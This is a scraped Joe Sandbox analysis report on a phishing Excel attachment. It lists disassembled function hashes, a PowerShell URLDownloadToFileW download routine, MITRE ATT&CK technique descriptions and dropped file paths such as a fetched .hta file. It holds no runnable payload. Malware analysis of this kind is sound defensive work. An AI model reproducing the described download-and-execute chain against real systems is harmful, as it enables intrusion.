Source File: 00000004.00000003.486458941.00000000029B0000.00000010.00000800.00020000.00000000.sdmp, Offset: 029B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_3_29b0000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
Instruction ID: 4473257208860168e358d5581d0343b082061d928538f4c9ca91adedb5470019
Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
Instruction Fuzzy Hash:

Function 029B0FC1 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000003.486458941.00000000029B0000.00000010.00000800.00020000.00000000.sdmp, Offset: 029B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_3_29b0000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
Instruction ID: 4473257208860168e358d5581d0343b082061d928538f4c9ca91adedb5470019
Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
Instruction Fuzzy Hash:

Analysis Process: powershell.exePID: 4064, Parent PID: 4040COMMON

Execution Graph

Execution Coverage:	4.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	3
Total number of Limit Nodes:	0

Executed Functions

Function 000007FE89867018 Relevance: 1.6, APIs: 1, Instructions: 129
filenetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

URLDownloadToFileW.URLMON ref: 000007FE89867BF0

Memory Dump Source

Source File: 00000007.00000002.511632729.000007FE89860000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7fe89860000_powershell.jbxd

Similarity

API ID: DownloadFile
String ID:
API String ID: 1407266417-0
Opcode ID: c0623aaa953ec58c668b5ce74bb1593ce5ea697a42c27b00a3bae4c707812a69
Instruction ID: 01a704a96492f30dbe87b23396944fa0e5782f9a5da67c500f77b8271dd97101
Opcode Fuzzy Hash: c0623aaa953ec58c668b5ce74bb1593ce5ea697a42c27b00a3bae4c707812a69
Instruction Fuzzy Hash: 9331C27190CA1C8FDB59EF4CE8897A9B7E1FB99321F00822ED04DD3651DB70B8468B81

Function 000007FE8993416A Relevance: 6.7, Strings: 5, Instructions: 412
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

0c{, xrefs: 000007FE89934337
0c{, xrefs: 000007FE89934207
8Fs, xrefs: 000007FE899342F6
0c{, xrefs: 000007FE89934300
(Fs, xrefs: 000007FE8993432D

Memory Dump Source

Source File: 00000007.00000002.511721929.000007FE89930000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7fe89930000_powershell.jbxd

Similarity

API ID:
String ID: (Fs$0c{$0c{$0c{$8Fs
API String ID: 0-1783069568
Opcode ID: 99d89d24d6431d7c38ae900d5b174f62d0c6af59ede59b646cd3cda5438f4d0a
Instruction ID: 7140b560a5922eb0b58728834e0ba3910b4cbc3c3855b60dbd23ea6db47f9df6
Opcode Fuzzy Hash: 99d89d24d6431d7c38ae900d5b174f62d0c6af59ede59b646cd3cda5438f4d0a
Instruction Fuzzy Hash: B0C1243091DACE4FEB4AEB2C58187BA7BE1EF4A344F1511AAD48EC71B3D614AC51C361

Function 000007FE89934193 Relevance: 6.5, Strings: 5, Instructions: 258
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

0c{, xrefs: 000007FE89934337
0c{, xrefs: 000007FE89934207
8Fs, xrefs: 000007FE899342F6
0c{, xrefs: 000007FE89934300
(Fs, xrefs: 000007FE8993432D

Memory Dump Source

Source File: 00000007.00000002.511721929.000007FE89930000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7fe89930000_powershell.jbxd

Similarity

API ID:
String ID: (Fs$0c{$0c{$0c{$8Fs
API String ID: 0-1783069568
Opcode ID: cacdf1ff36acfdeb2e3c4482dc4a1ff7c147399aa882548296ec262f903603de
Instruction ID: 7e7a5a6cc31996b188b8e109e0b872091bd4656d56bc59671d5ac04adad0b95f
Opcode Fuzzy Hash: cacdf1ff36acfdeb2e3c4482dc4a1ff7c147399aa882548296ec262f903603de
Instruction Fuzzy Hash: 2F81132091DBCA0FE74AA72C45547797FE1EF46784F1A10EAD48ECB1F3C618AC568361

Function 000007FE89938549 Relevance: 3.2, Strings: 2, Instructions: 708
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

0c{, xrefs: 000007FE899386F1
8={, xrefs: 000007FE89938B31

Memory Dump Source

Source File: 00000007.00000002.511721929.000007FE89930000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7fe89930000_powershell.jbxd

Similarity

API ID:
String ID: 0c{$8={
API String ID: 0-3563221786
Opcode ID: 425aa7a3e60f405d8f8618a683a4900f3dedc9ac21dcde2cc78eaceef84e00e6
Instruction ID: 6d91081b4b73f2ba308a6198d13d3cc93e04c4cb4b3c1f8bc3377b758db87a13
Opcode Fuzzy Hash: 425aa7a3e60f405d8f8618a683a4900f3dedc9ac21dcde2cc78eaceef84e00e6
Instruction Fuzzy Hash: 6A22273090CBC94FE74ADB2C94642697BE2FF8A354F2411AED48EC72B3DA20AC55C741

Function 000007FE8993566D Relevance: 3.0, Strings: 2, Instructions: 468
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

V, xrefs: 000007FE89935744
0c{, xrefs: 000007FE899357AD

Memory Dump Source

Source File: 00000007.00000002.511721929.000007FE89930000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7fe89930000_powershell.jbxd

Similarity

API ID:
String ID: 0c{$V
API String ID: 0-1789350280
Opcode ID: 469c4f6ff78b3426341b042ad1be48e69c4e67be486d1fe40ab4b501c45d5123
Instruction ID: 793d751e57fb4ae0260f390c54e5c7adcd63d5ddd72780a0c409a10e645a1ca1
Opcode Fuzzy Hash: 469c4f6ff78b3426341b042ad1be48e69c4e67be486d1fe40ab4b501c45d5123
Instruction Fuzzy Hash: D9D1F73080E7C91FE3579B2C58146A97FA4EF47260B0911EBD48DCB0B3D614691AC3A2

Function 000007FE89867AE1 Relevance: 1.7, APIs: 1, Instructions: 159
filenetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

URLDownloadToFileW.URLMON ref: 000007FE89867BF0

Memory Dump Source

Source File: 00000007.00000002.511632729.000007FE89860000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7fe89860000_powershell.jbxd

Similarity

API ID: DownloadFile
String ID:
API String ID: 1407266417-0
Opcode ID: a52afc2dab573a7c2e97abe636c0b60c5f0b9b38e3606699a64ae51b2240ba5a
Instruction ID: ec024a726cac32501d8d1d416a5d431b1ad12cecf250c37d510dc42b11b61b80
Opcode Fuzzy Hash: a52afc2dab573a7c2e97abe636c0b60c5f0b9b38e3606699a64ae51b2240ba5a
Instruction Fuzzy Hash: 1E41277080CB899FDB16DB5898447FABBF4FB56321F0482AFD08DD7552CB246806C781

Function 000007FE899310D3 Relevance: 1.4, Strings: 1, Instructions: 153
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

xFs, xrefs: 000007FE8993117C

Memory Dump Source

Source File: 00000007.00000002.511721929.000007FE89930000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7fe89930000_powershell.jbxd

Similarity

API ID:
String ID: xFs
API String ID: 0-2360960591
Opcode ID: c4a4ab8c3f4c39f8510bf29beb91b60f8b142934801a816ae01763cc00c106c6
Instruction ID: 9121218b6bfc52c89fa4ddcf0bfd63e274e953c5fe39902143dde8eb022849a3
Opcode Fuzzy Hash: c4a4ab8c3f4c39f8510bf29beb91b60f8b142934801a816ae01763cc00c106c6
Instruction Fuzzy Hash: 4D41D211A0DBC90FE34B973C18642A47FE1DF4B255B2911EBD48ECB1B3E9099C5AC3A1

Non-executed Functions

Function 000007FE8993352E Relevance: 2.8, Strings: 2, Instructions: 329COMMON

Download Yara Rule

Strings

0c{, xrefs: 000007FE89933642
h.y, xrefs: 000007FE899336CE

Memory Dump Source

Source File: 00000007.00000002.511721929.000007FE89930000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7fe89930000_powershell.jbxd

Similarity

API ID:
String ID: 0c{$h.y
API String ID: 0-1436900916
Opcode ID: 3a5f008f15c4174641595ccbfb6dd9f369ca62e33c20d7ccffeea782112814cc
Instruction ID: 04a6b8543adf29e6157cde58d9ee33ec0656bf49ea6a298027ae1014155a0b2f
Opcode Fuzzy Hash: 3a5f008f15c4174641595ccbfb6dd9f369ca62e33c20d7ccffeea782112814cc
Instruction Fuzzy Hash: EEA1252190E7C90FE747AB7898142A63FE1EF57358F1901EBD48DCB1B3D618991AC362

Function 000007FE89933A81 Relevance: 9.0, Strings: 7, Instructions: 232
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

h.y, xrefs: 000007FE89933B30
Xh@, xrefs: 000007FE89933C43
h.y, xrefs: 000007FE89933B85
h.y, xrefs: 000007FE89933B73
h.y, xrefs: 000007FE89933BA9
h.y, xrefs: 000007FE89933B54
h.y, xrefs: 000007FE89933B97

Memory Dump Source

Source File: 00000007.00000002.511721929.000007FE89930000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7fe89930000_powershell.jbxd

Similarity

API ID:
String ID: Xh@$h.y$h.y$h.y$h.y$h.y$h.y
API String ID: 0-3136002966
Opcode ID: e1aa8ee3bea3d0c5ee276a5456325ed280ef106bb71816ad23d509ff077021ab
Instruction ID: fa8f673ae1cb4d2bcd98187d2a00d83664b9775efe630233a7b75326b99b140b
Opcode Fuzzy Hash: e1aa8ee3bea3d0c5ee276a5456325ed280ef106bb71816ad23d509ff077021ab
Instruction Fuzzy Hash: 3261F421A0D6CA4FE757A73C18602A67FB2EF87244F1911EBD08DCB1B3D6185819C3A1

Function 000007FE8993380A Relevance: 6.5, Strings: 5, Instructions: 280
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

h.y, xrefs: 000007FE89933912
Xh@, xrefs: 000007FE89933957
h.y, xrefs: 000007FE8993399B
`kv, xrefs: 000007FE89933982
889, xrefs: 000007FE899339F7

Memory Dump Source

Source File: 00000007.00000002.511721929.000007FE89930000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7fe89930000_powershell.jbxd

Similarity

API ID:
String ID: 889$Xh@$`kv$h.y$h.y
API String ID: 0-2439529038
Opcode ID: 86080fe9e0eb20b75622ef4475c538badff285b717067b1a714b487e7ae2bad2
Instruction ID: f4c99767ea3e73b2c675569cf254317a021aa7a15dc763ef8c6389cf5b5d4c16
Opcode Fuzzy Hash: 86080fe9e0eb20b75622ef4475c538badff285b717067b1a714b487e7ae2bad2
Instruction Fuzzy Hash: 8B810D2194EBD64FEB13977C58252A57FE1DF87260B0E01EBC489CB1B3C5099C0AC3A2

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate.Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used.For example, information about application windows could be used identify potential data to collect as well as identifying security tooling ( Security Software Discovery ) to evade.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report SOA USD67,353.35.xla.xlsx

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Dropped Files

Memory Dumps

Sigma Signatures

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Phishing

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\goodthhingswithgreatcapitalthingsforgreatnewswithgoodmorng[1].hta

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\simplecookiebiscutwithsweetnessforentiretime[1].tiff

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1096C50E.emf

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\151FBAF3.emf

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\288995B7.emf

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D96E0C3A.emf

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E9221B01.emf

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F8D45058.emf

C:\Users\user\AppData\Local\Temp\RES5706.tmp

C:\Users\user\AppData\Local\Temp\c0vottoj.rsp.ps1

C:\Users\user\AppData\Local\Temp\ho03fsic.s2y.psm1

C:\Users\user\AppData\Local\Temp\l2ioe53r\CSC777882445C184F59ADDE974B4279F6D.TMP

C:\Users\user\AppData\Local\Temp\l2ioe53r\l2ioe53r.0.cs

Windows Analysis Report
SOA USD67,353.35.xla.xlsx

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre